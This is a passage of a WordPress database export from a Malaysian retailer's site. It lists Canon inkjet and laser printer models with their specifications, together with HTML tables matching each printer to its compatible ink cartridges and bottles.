<td>CLI-771 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-771 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-771 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-771 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-771XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-771XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-771XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-771XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-770 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-770XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA TS5170</td>\n      <td>CL-741 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-741XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-740 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-740/CL-741 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-740XL (Pigment Black)</td>\n    </tr>\n  </tbody>\n</table><table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n    <tr align=\"center\">\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"12\" align=\"center\">PIXMA TS8270</td>\n      <td>CLI-781 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Photo Blue)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Photo Blue)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-780 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-780XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"12\" align=\"center\">PIXMA TS9170</td>\n      <td>CLI-781 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Photo Blue)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Photo Blue)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-780 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-780XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"10\" align=\"center\">PIXMA TS9570</td>\n      <td>CLI-781 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-781 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-781XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-780 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-780XL (Pigment Black)</td>\n    </tr>\n  </tbody>\n</table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-25 11:28:14','2019-09-25 03:28:14','',1449,'https://bintara.com.my/blog/2019/09/25/1449-revision-v1/',0,'revision','',0),(3336,1,'2019-09-25 11:19:18','2019-09-25 03:19:18','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h2>Cartridge Printers :-</h2>		\n		<table border=\"1\" width=\"378\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"13\" align=\"center\">imagePROGRAF PRO-500</td>\n<td>Maintenance Cartridge MC-20</td>\n</tr>\n<tr>\n<td>PFI-50 (Blue)</td>\n</tr>\n<tr>\n<td>PFI-50 (Chroma Optimizer)</td>\n</tr>\n<tr>\n<td>PFI-50 (Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Matte Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Red)</td>\n</tr>\n<tr>\n<td>PFI-50 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY iB4170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5070</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5370</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5470</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E3170</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E410</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E4270</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E470</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E477</td>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E480</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E510</td>\n<td>CL-98 (Colour)</td>\n</tr>\n<tr>\n<td>PG-88 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560 / E560R</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G2010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G4010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP100</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110 (with battery)</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" 